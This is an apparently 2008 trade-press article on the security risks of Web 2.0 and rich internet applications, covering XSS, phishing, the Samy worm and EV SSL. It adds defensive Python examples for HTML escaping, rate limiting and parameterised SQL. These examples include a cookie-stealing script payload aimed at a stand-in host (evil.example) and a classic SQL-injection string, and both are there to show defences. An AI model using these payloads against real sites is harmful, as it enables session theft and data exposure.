Web 2.0 promises a banquet of tasty features, rich experience and sizzling socialising. But will the dash to gorge bring its own problems?
Given the hyperbole surrounding rich internet applications (RIA), Web 2.0 and social networking, you would not be surprised to hear a Microsoft program manager, Joe Stagner, say, "It is a perfect storm for RIAs right now. Companies developing web applications cannot wait any longer to solidify their RIA strategy."
The implication is clear: if your company delays building rich, responsive, socially networked web applications - with tools such as Ajax, Flex, Appcelerator and Silverlight - you could be left behind: your competitors are forging ahead, and you must rush to adopt.
Yet according to Ken Munro, managing director at penetration testing specialist Secure Test, rushing into Web 2.0 is the last thing you should be doing, because the consequences of getting your security wrong are severe.
"You can get a vulnerability in a web application that is exploited one day and infects a million users the next. The potential impact is so big, it is enough to take a brand down," he says.
And his remarks are not fantasy. Two years ago the Samy worm spread exponentially, infecting more than a million users of the social networking site Myspace within 24 hours. Samy smashed the previous propagation record for an internet worm, set by Code Red in July 2001, which managed only a paltry 350,000 victims after four days. Luckily for Myspace, Samy also gained some "cool" status for its benign effect: the payload amounted only to making each victim a "friend" of the worm's writer.
Jonathan Armstrong, technology law partner at Eversheds, agrees with Munro's pessimism, particularly with regard to social networking sites. He says that reputation risk is much more important to companies than risk from litigation or legislation. "If you get it wrong, then you are dead. A lot of the business models are just chasing visitor numbers, but if they compromise the visitor, then they are worthless. The community ethos is the value behind it, and if you destroy the ethos, then you destroy the brand."
The desire for visitors causes experimentation with new technologies, but the security issues these technologies bring are not always immediately apparent. And because RIA necessarily increases the amount of computer code downloaded to the browser, in order to produce the desired richness, there is more for a hacker to examine and exploit. Hackers read the source code, or perhaps re-engineer it, and look for areas of weakness.
Ajax, a web development technique built on JavaScript, is singled out by Munro as potentially dangerous because it operates asynchronously, in the background, without the user's explicit knowledge. "A lot of the processing is happening in the Ajax engine. It is hiding some of the actual processing from you. Stuff is going on in the background of your browser, being processed in real time, that you are not directly controlling," he says.
Asynchronous code can help avoid the clunky reloading of web pages. For example, instead of an entire page being refreshed when the user completes typing into a search box, smaller incremental data exchanges can occur, continually updating the page while the user types.
This innovation improves a surfing experience, but it also increases vulnerability and the amount a hacker can achieve if a system is compromised.
Munro believes cross-site scripting (XSS) is the largest threat to Web 2.0. Malicious XSS subverts a user's browser to run instructions from somewhere other than the site visited, and although this attack has been known about for many years, the introduction of RIA and asynchronous techniques increases its potency. All a victim needs to do is click one fraudulent link and code can be running in the background, logging keystrokes, stealing cookies or sending spam.
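The standard defence named in the sidebar below - input filtering - amounts to treating user-supplied text as data, never as markup. A minimal sketch in Python (the principle applies to any server-side language; the malicious comment is an invented example):

```python
import html

def render_comment(user_input: str) -> str:
    """Escape user-supplied text before embedding it in a page,
    so an injected script tag is displayed rather than executed."""
    return "<p>" + html.escape(user_input) + "</p>"

# A hypothetical malicious comment that tries to steal the session cookie:
payload = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
safe = render_comment(payload)

# The angle brackets and quotes are now inert HTML entities:
assert "<script>" not in safe
assert "&lt;script&gt;" in safe
```

Escaping on output is only one layer; sites that must accept some HTML (as picture-sharing and profile sites often do) typically add an allowlist filter on input as well.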
Andrew Kellet, security analyst at Butler Group, sees all this as just a tired re-running of technological roll-outs without proper thought. "The business IT industry is going through another one of those head-scratching exercises. When new approaches to delivery and usage have come along, security has tended to lag behind. There is no excuse for not putting security facilities into products, and that goes right back to the build and development."
To make matters worse, Kellet says many users of Web 2.0 tend to be a self-selecting group of high-income, technology-rich twenty-somethings: ideal targets for fraudsters. "They are probably employed in an industry that pays well, will have credit cards and online account facilities," he says.
Rich pickings attract attention, but many companies are fighting back and stipulating the security measures developers must build. "It depends on the requirements for the particular project," says Mike Jones, an independent RIA developer. "If you are dealing with transactional information, especially of a commerce nature, then you are going to use all of the tools and methods that are inbuilt into the browser."
However, he says, "A client may say, 'we want it to be secure', but that is just a buzzword they have heard because security is very big at the moment. They may not have a concept of what they are asking for."
It must not be forgotten that security issues are often deeply technical and there can be a mismatch between business knowledge and developer experience.
This is one reason why Badoo, a social networking and picture-sharing website boasting nearly 13 million users, tries to employ only top development staff. It is a critical policy for the company, says program manager Mike Greer. "Our computer engineers have at least ten years' experience - each of them. We hire only the people that have shown themselves to be pretty amazing in their field," he says.
But Badoo does not rely on hope that its developers will write secure code. Given its complex mixture of open source products - including MySQL, PHP and Nginx - plus a lot of in-house C++ and C software, it was essential the company established safe-site practices and policies. These included filtering all user input for active HTML or script content, forbidding users from adding off-site links, and installing smart captchas that brake overly active users who might turn out to be bots.
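The "brake" on overly active accounts can be as simple as a token-bucket rate limiter that lets normal users act freely but throttles bot-like bursts. The sketch below is a generic illustration of the idea, not Badoo's implementation; the capacity and refill figures are invented:

```python
import time

class TokenBucket:
    """Allow a short burst of actions, then throttle to a steady refill rate.
    When the bucket is empty, the site can demand a captcha instead."""

    def __init__(self, capacity: float, refill_per_sec: float):
        self.capacity = capacity
        self.tokens = capacity          # start with a full burst allowance
        self.refill_per_sec = refill_per_sec
        self.last = time.monotonic()

    def allow(self) -> bool:
        now = time.monotonic()
        # Top the bucket up in proportion to the time elapsed since the last call
        self.tokens = min(self.capacity,
                          self.tokens + (now - self.last) * self.refill_per_sec)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False                    # likely a bot: challenge the user

# Example: five rapid actions pass, the sixth is challenged
bucket = TokenBucket(capacity=5, refill_per_sec=0.5)
results = [bucket.allow() for _ in range(6)]
```

A per-account bucket like this catches scripted spamming without inconveniencing users who merely click quickly for a moment.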
"We have also introduced, and believe it should become an industry standard, extended validation SSL certificates (EVSSL). This will work with the user's browser to allow them to know when they are on a validated site, by showing them a green URL bar," says Greer.
The EVSSL initiative has been driven by Verisign since a 2006 Harvard/UC Berkeley study showed that 90% of consumers could not tell the difference between a website and its fraudulent counterpart.
Such knowledge is essential to prevent phishing, which remains a constant threat. But Web 2.0 with asynchronous coding can make phishing much harder to detect. "By just browsing to a website you have got something running. We started shouting warnings about phishing and cross site scripting being used together, and, lo and behold, a bank was phished with an XSS attack," said Munro.
Munro is referring to January's Banca Fideuram attack, which was the first XSS-phishing attack to run on a bank's own website, using a genuine SSL certificate, making it very difficult for the user to know the login screen was fraudulent.
"Sadly, I think EVSSL is an irrelevance, and will probably just accelerate the use of XSS in phishing attacks, as conventional phishing attacks become less effective as a result of EVSSL," says Munro.
This is no reason, of course, not to make it difficult for standard, non-XSS, phishers. "Research indicates that EV is definitely effective as a deterrent against phishing, and companies have every reason to take advantage of EV to combat phishing," says Tim Callan, vice-president of product marketing at Verisign.
"Companies can also take steps to protect their sites against XSS, and they should go ahead and do that as well," says Callan.
XSS cannot work without a vulnerability in the target site's coding, which is why it is so important to consider security from the outset of a website project, to ensure that security is part of the build methodology, says Butler Group's Kellet.
And software developer Jones agrees, saying, "Although it is really cool to build an application and get it out there, when you start having real people using your system you have to be very conscious you are dealing with their data. Do not build a prototype and then launch it. Build a prototype, do the test, learn from what you have developed, and take that learning and build the actual system."
Jones says he has been frustrated to see clients not taking security seriously: beguiled by the technology, and often under time and budget constraints, they rush into cool developments. "A lot of them were start-ups rather than established businesses, but if development's not done with due diligence, you can end up in a pickle," he says.
Web 2.0 and rich internet vulnerabilities
Cross-site scripting (XSS): The user's browser is subverted to run instructions from somewhere other than the site visited. Sessions may be stolen, cookies read or keystrokes logged. Defence includes input validation and input filtering.
Client side validation: To save network time users' input can be checked by the browser. Hackers can inspect the validation and either circumvent or change the checks. Validation should be performed server-side, or checked on the server.
Thick client binary manipulation: Applications running partially on the client can be re-engineered back to source code, changed, then recompiled. Defence includes server-side programming and code obfuscation.
Prototype theft: Object-oriented programming allows code and data to be overridden. Any XSS vulnerability may enable hackers to "wrap" genuine code with a malicious program.
SQL injection: Database queries formulated from unchecked user input can be vulnerable to the insertion of additional SQL syntax, revealing data structure and security measures.
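The standard defence against SQL injection is to keep SQL syntax and user data strictly separate with parameterised queries. A minimal sketch using Python's built-in sqlite3 module (the table and the malicious input are invented for illustration):

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'secret')")

# Classic injection string: tries to make the WHERE clause always true
evil = "' OR '1'='1"

# Vulnerable: user input is spliced directly into the SQL text,
# so the query becomes  ... WHERE password = '' OR '1'='1'
rows = conn.execute(
    "SELECT name FROM users WHERE password = '" + evil + "'"
).fetchall()            # returns every user

# Safe: the driver passes the input purely as data, never as SQL syntax
safe_rows = conn.execute(
    "SELECT name FROM users WHERE password = ?", (evil,)
).fetchall()            # matches nothing
```

Running this, the concatenated query leaks the whole table while the parameterised one returns no rows; every mainstream database driver offers equivalent placeholder syntax.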
This was first published in February 2008